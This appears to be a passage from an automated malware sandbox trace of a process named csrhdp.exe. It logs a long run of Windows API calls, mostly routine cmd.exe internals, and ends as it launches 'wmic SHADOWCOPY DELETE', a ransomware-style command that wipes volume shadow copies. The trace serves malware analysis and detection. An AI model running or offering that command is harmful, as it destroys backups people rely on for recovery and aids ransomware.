(_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0099.290] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0099.290] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0099.290] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0099.290] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0099.290] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0099.290] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0099.290] GetProcessHeap () returned 0x340000 [0099.290] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x5c) returned 0x35b6d0 [0099.290] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26faf0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0099.290] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x26faf0, lpFilePart=0x26fad0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26fad0*="Desktop") returned 0x25 [0099.290] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0099.290] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f800 | out: lpFindFileData=0x26f800*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x35b740 [0099.290] FindClose (in: hFindFile=0x35b740 | out: hFindFile=0x35b740) returned 1 [0099.291] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x26f800 | out: lpFindFileData=0x26f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x35b740 [0099.291] FindClose (in: hFindFile=0x35b740 | out: hFindFile=0x35b740) returned 1 [0099.291] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0099.291] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x26f800 | out: lpFindFileData=0x26f800*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5f5d9f50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x5f5d9f50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x35b740 [0099.291] FindClose (in: hFindFile=0x35b740 | out: hFindFile=0x35b740) returned 1 [0099.291] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0099.291] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0099.291] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0099.291] GetProcessHeap () returned 0x340000 [0099.291] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35ac30 | out: hHeap=0x340000) returned 1 [0099.291] GetEnvironmentStringsW () returned 0x35b740* [0099.291] GetProcessHeap () returned 0x340000 [0099.291] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xae8) returned 0x35c230 [0099.291] FreeEnvironmentStringsW (penv=0x35b740) returned 1 [0099.291] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4acec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0099.291] GetProcessHeap () returned 0x340000 [0099.291] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35b6d0 | out: hHeap=0x340000) returned 1 [0099.291] GetProcessHeap () returned 0x340000 [0099.291] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x4016) returned 0x35cd20 [0099.292] GetProcessHeap () returned 0x340000 [0099.292] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x42) returned 0x359550 [0099.292] GetProcessHeap () returned 0x340000 [0099.292] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35cd20 | out: hHeap=0x340000) returned 1 [0099.292] GetConsoleOutputCP () returned 0x1b5 [0099.292] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4acebfe0 | out: lpCPInfo=0x4acebfe0) returned 1 [0099.292] GetUserDefaultLCID () returned 0x409 [0099.292] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ace7b50, cchData=8 | out: lpLCData=":") returned 2 [0099.292] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fc00, cchData=128 | out: lpLCData="0") returned 2 [0099.292] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fc00, cchData=128 | out: lpLCData="0") returned 2 [0099.293] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fc00, cchData=128 | out: lpLCData="1") returned 2 [0099.293] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4acfa740, cchData=8 | out: lpLCData="/") returned 2 [0099.293] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4acfa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0099.293] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4acfa460, cchData=32 | out: lpLCData="Tue") returned 4 [0099.293] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4acfa420, cchData=32 | out: lpLCData="Wed") returned 4 [0099.293] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4acfa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0099.293] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4acfa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0099.293] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4acfa360, cchData=32 | out: lpLCData="Sat") returned 4 [0099.293] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4acfa700, cchData=32 | out: lpLCData="Sun") returned 4 [0099.293] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ace7b40, cchData=8 | out: lpLCData=".") returned 2 [0099.293] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4acfa4e0, cchData=8 | out: lpLCData=",") returned 2 [0099.293] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0099.294] GetProcessHeap () returned 0x340000 [0099.294] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x20c) returned 0x359610 [0099.294] GetConsoleTitleW (in: lpConsoleTitle=0x359610, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 0x30 [0099.294] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0099.294] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0099.294] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0099.294] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0099.294] GetProcessHeap () returned 0x340000 [0099.294] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x4012) returned 0x35cd20 [0099.294] GetProcessHeap () returned 0x340000 [0099.294] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35cd20 | out: hHeap=0x340000) returned 1 [0099.295] _wcsicmp (_String1="wmic", _String2=")") returned 78 [0099.295] _wcsicmp (_String1="FOR", _String2="wmic") returned -17 [0099.295] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17 [0099.295] _wcsicmp (_String1="IF", _String2="wmic") returned -14 [0099.295] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14 [0099.295] _wcsicmp (_String1="REM", _String2="wmic") returned -5 [0099.295] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5 [0099.295] GetProcessHeap () returned 0x340000 [0099.295] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xb0) returned 0x359830 [0099.295] GetProcessHeap () returned 0x340000 [0099.295] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x1a) returned 0x3545e0 [0099.295] GetProcessHeap () returned 0x340000 [0099.295] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x36) returned 0x3564d0 [0099.296] GetConsoleTitleW (in: lpConsoleTitle=0x26fb10, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 0x30 [0099.296] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0099.296] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0099.296] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0099.296] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0099.296] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0099.296] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0099.296] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0099.296] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0099.296] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0099.296] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0099.296] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0099.296] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0099.296] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0099.296] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0099.296] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0099.297] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0099.297] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0099.297] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0099.297] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0099.297] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0099.297] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0099.297] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0099.297] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0099.297] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0099.297] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0099.297] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0099.297] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0099.297] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0099.297] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0099.297] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0099.297] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0099.297] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0099.297] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0099.297] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0099.297] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0099.297] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0099.297] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0099.297] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0099.297] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0099.297] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0099.297] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0099.297] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0099.297] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0099.297] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0099.297] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0099.297] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0099.297] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0099.297] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0099.297] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0099.297] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0099.297] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0099.297] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0099.297] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0099.297] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0099.297] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0099.298] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0099.298] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0099.298] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0099.298] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0099.298] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0099.298] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0099.298] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0099.298] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0099.298] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0099.298] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0099.298] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0099.298] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0099.298] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0099.298] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0099.298] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0099.298] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0099.298] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0099.298] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0099.298] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0099.298] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0099.298] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0099.298] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0099.298] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0099.298] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0099.298] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0099.298] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0099.298] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0099.298] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0099.298] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0099.298] _wcsicmp (_String1="wmic", _String2="FOR") returned 17 [0099.298] _wcsicmp (_String1="wmic", _String2="IF") returned 14 [0099.298] _wcsicmp (_String1="wmic", _String2="REM") returned 5 [0099.298] GetProcessHeap () returned 0x340000 [0099.298] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x218) returned 0x3598f0 [0099.298] GetProcessHeap () returned 0x340000 [0099.299] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x40) returned 0x35ac60 [0099.299] _wcsnicmp (_String1="wmic", _String2="cmd ", _MaxCount=0x4) returned 20 [0099.299] GetProcessHeap () returned 0x340000 [0099.299] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x420) returned 0x359b10 [0099.299] SetErrorMode (uMode=0x0) returned 0x0 [0099.299] SetErrorMode (uMode=0x1) returned 0x0 [0099.299] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x359b20, lpFilePart=0x26f3a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26f3a0*="Desktop") returned 0x25 [0099.299] SetErrorMode (uMode=0x0) returned 0x1 [0099.299] GetProcessHeap () returned 0x340000 [0099.299] RtlReAllocateHeap (Heap=0x340000, Flags=0x0, Ptr=0x359b10, Size=0x66) returned 0x359b10 [0099.299] GetProcessHeap () returned 0x340000 [0099.299] RtlSizeHeap (HeapHandle=0x340000, Flags=0x0, MemoryPointer=0x359b10) returned 0x66 [0099.300] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.300] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0099.300] GetProcessHeap () returned 0x340000 [0099.300] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x128) returned 0x359b90 [0099.300] GetProcessHeap () returned 0x340000 [0099.300] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x240) returned 0x359cc0 [0099.305] GetProcessHeap () returned 0x340000 [0099.305] RtlReAllocateHeap (Heap=0x340000, Flags=0x0, Ptr=0x359cc0, Size=0x12a) returned 0x359cc0 [0099.305] GetProcessHeap () returned 0x340000 [0099.305] RtlSizeHeap (HeapHandle=0x340000, Flags=0x0, MemoryPointer=0x359cc0) returned 0x12a [0099.305] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.305] GetProcessHeap () returned 0x340000 [0099.306] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xe8) returned 0x359e00 [0099.306] GetProcessHeap () returned 0x340000 [0099.306] RtlReAllocateHeap (Heap=0x340000, Flags=0x0, Ptr=0x359e00, Size=0x7e) returned 0x359e00 [0099.306] GetProcessHeap () returned 0x340000 [0099.306] RtlSizeHeap (HeapHandle=0x340000, Flags=0x0, MemoryPointer=0x359e00) returned 0x7e [0099.307] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.307] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x26f110, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f110) returned 0xffffffffffffffff [0099.307] GetLastError () returned 0x2 [0099.307] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic", fInfoLevelId=0x1, lpFindFileData=0x26f110, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f110) returned 0xffffffffffffffff [0099.307] GetLastError () returned 0x2 [0099.307] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.307] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x26f110, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f110) returned 0xffffffffffffffff [0099.308] GetLastError () returned 0x2 [0099.308] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic", fInfoLevelId=0x1, lpFindFileData=0x26f110, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f110) returned 0xffffffffffffffff [0099.308] GetLastError () returned 0x2 [0099.308] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.308] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x26f110, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f110) returned 0xffffffffffffffff [0099.308] GetLastError () returned 0x2 [0099.308] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic", fInfoLevelId=0x1, lpFindFileData=0x26f110, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f110) returned 0xffffffffffffffff [0099.308] GetLastError () returned 0x2 [0099.308] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.308] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x26f110, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f110) returned 0x359e90 [0099.309] GetProcessHeap () returned 0x340000 [0099.309] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x28) returned 0x354610 [0099.309] FindClose (in: hFindFile=0x359e90 | out: hFindFile=0x359e90) returned 1 [0099.309] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x26f110, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f110) returned 0xffffffffffffffff [0099.309] GetLastError () returned 0x2 [0099.309] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x26f110, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f110) returned 0x359e90 [0099.309] GetProcessHeap () returned 0x340000 [0099.309] RtlReAllocateHeap (Heap=0x340000, Flags=0x0, Ptr=0x354610, Size=0x8) returned 0x358900 [0099.309] FindClose (in: hFindFile=0x359e90 | out: hFindFile=0x359e90) returned 1 [0099.309] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0099.309] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0099.309] GetConsoleTitleW (in: lpConsoleTitle=0x26f660, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 0x30 [0099.309] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f418, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f3d8 | out: lpAttributeList=0x26f418, lpSize=0x26f3d8) returned 1 [0099.309] UpdateProcThreadAttribute (in: lpAttributeList=0x26f418, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f3c8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f418, lpPreviousValue=0x0) returned 1 [0099.309] GetStartupInfoW (in: lpStartupInfo=0x26f530 | out: lpStartupInfo=0x26f530*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0099.309] GetProcessHeap () returned 0x340000 [0099.309] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x20) returned 0x354610 [0099.309] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0099.309] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0099.309] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0099.310] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0099.310] GetProcessHeap () returned 0x340000 [0099.310] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x354610 | out: hHeap=0x340000) returned 1 [0099.310] GetProcessHeap () returned 0x340000 [0099.310] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x12) returned 0x359e90 [0099.311] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0099.312] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic SHADOWCOPY DELETE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x26f450*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wmic SHADOWCOPY DELETE", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f400 | out: lpCommandLine="wmic 